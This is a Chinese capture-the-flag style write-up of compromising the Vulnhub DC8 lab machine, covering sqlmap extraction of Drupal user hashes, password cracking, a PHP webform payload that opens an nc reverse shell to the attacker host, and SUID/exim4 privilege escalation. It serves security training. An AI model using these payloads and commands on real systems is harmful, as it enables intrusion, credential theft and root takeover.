基于Vulnhub—DC8靶场渗透测试过程

简介: 这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码

0x00 靶场环境搭建

DC8下载链接

下载完成之后导入vmware或者virtualBox,网卡改为nat模式或仅主机模式(方便信息收集)

0x01 信息收集

arp-scan -l 扫描同号段发现靶机IP地址,直接nmap走起发现靶机开了80、22端口

尝试爆破了22端口,结果没用,但是在80端口web页面有一个cms,发现是一个Drupal的一个cms但是并没有发现相关的cms爆出的洞,于是我们随意点击一些链接发现存在报错注入

0x02靶场渗透

那么直接使用sqlmap一把梭试试,成功跑出两个用户名密码

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch --dbs

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' --tables

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' -T users --columns

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' -T users -C name,pass --dump

使用john破译出一个明文密码:turtle,使用御剑扫描出robots.txt,并发现后台管理员登录的地址,使用john用户名与爆破出的密码成功登录后台

于是寻找上传点,Contact Us->Webform->Form settings

<?php system("nc -e /bin/bash 192.168.94.207 4444");?>

点击保存

Kali linux开启监听,并回到Contact us填写内容进行提交并处罚反弹shell木马返回至kali当中

使用python创建一个伪终端(PTY)并执行交互式的 Bash shell

python -c 'import pty;pty.spawn("/bin/bash")'

0x03权限提升

尝试查找suid文件来进行提权

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -print 2>/dev/null

这两个命令都是用于在 Linux 系统中查找具有 SUID 权限设置的文件。它们的作用是相同的,只是使用了不同的方式来查询。

第一个命令 find / -perm -u=s -type f 2>/dev/null 使用 -perm -u=s 来查找具有 SUID 权限设置的文件,而第二个命令 find / -user root -perm -4000 -print 2>/dev/null 使用 -user root -perm -4000 来查找属主为 root 并且具有 SUID 权限设置的文件。

在这两个命令中,-perm -u=s-perm -4000 都表示查找具有 SUID 权限设置的文件,-type f 用于限定搜索结果为普通文件,-user root 用于匹配属主为 root 的文件。

2>/dev/null 是将标准错误输出重定向到 /dev/null,这样可以隐藏权限不足等错误信息,让输出更清晰。

找到一个exim4的程序,于是查看exim4的具体版本号,则为exim4.89,返回kali中搜索对应的提权程序

接着进入改目录并使用Python搭建一个简单的web服务,然后下载至靶机当中进行提权。

在此目录我们发现没有权限下载,那么我们进入tmp目录进行下载

在Linux系统中,/tmp目录通常用于存储临时文件。这个目录通常被用于存放程序在运行过程中产生的临时文件,例如临时的缓存文件、临时的交换文件等。这些文件在系统重启时会被删除,因此不适合用来存放重要数据。

/tmp目录对所有用户都是可写的,这意味着任何用户都可以在这个目录下创建、编辑和删除文件。由于/tmp目录是共享的,所以需要注意确保在该目录下创建的临时文件不会影响其他用户或系统运行。

于是我们直接赋予777权限,并运行此提权程序

成功提权并找到flag值!

目录
相关文章
|
4天前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
30 0
|
4天前
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
|
4天前
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA  AC/DC电源模块的可靠性设计与测试方法
|
4天前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
8 0
|
4天前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
18 0
|
4天前
|
网络协议 安全 测试技术
性能工具之emqtt-bench BenchMark 测试示例
【4月更文挑战第19天】在前面两篇文章中介绍了emqtt-bench工具和MQTT的入门压测,本文示例 emqtt_bench 对 MQTT Broker 做 Beachmark 测试,让大家对 MQTT消息中间 BenchMark 测试有个整体了解,方便平常在压测工作查阅。
133 7
性能工具之emqtt-bench BenchMark 测试示例
|
4天前
|
机器学习/深度学习 数据采集 人工智能
【专栏】AI在软件测试中的应用,如自动执行测试用例、识别缺陷和优化测试设计
【4月更文挑战第27天】本文探讨了AI在软件测试中的应用,如自动执行测试用例、识别缺陷和优化测试设计。AI辅助工具利用机器学习、自然语言处理和图像识别提高效率,但面临数据质量、模型解释性、维护更新及安全性挑战。未来,AI将更注重用户体验,提升透明度,并在保护隐私的同时,通过联邦学习等技术共享知识。AI在软件测试领域的前景广阔,但需解决现有挑战。
|
4天前
|
测试技术
如何管理测试用例?测试用例有什么管理工具?YesDev
该文档介绍了测试用例和测试用例库的管理。测试用例是描述软件测试方案的详细步骤,包括测试目标、环境、输入、步骤和预期结果。测试用例库用于组织和管理这些用例,强调简洁性、完整性和可维护性。管理者可以创建、删除、重命名用例库,搜索和管理用例,以及通过层级目录结构来组织用例。此外,还支持通过Excel导入和导出测试用例,以及使用脑图查看用例关系。后台管理允许配置全局别名,如用例状态、优先级和执行结果。
|
4天前
|
机器学习/深度学习 人工智能 运维
深入探索软件测试:策略、工具与未来趋势
【5月更文挑战第14天】在软件开发的生命周期中,测试环节扮演着至关重要的角色。它不仅保证产品能够达到预定的质量标准,还有助于提前发现并修复潜在的缺陷,从而减少维护成本和提高用户满意度。本文将深入探讨当前软件测试领域的最佳实践,包括测试策略的制定、工具的选择以及面对快速变化的技术环境如何保持测试活动的前瞻性和灵活性。通过分析自动化测试、性能测试和安全测试等关键领域,本文旨在为读者提供一个全面的软件测试指南,同时对未来的发展趋势进行预测。
|
4天前
|
SQL 测试技术 网络安全
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
28 0

热门文章

最新文章

http://www.vxiaotou.com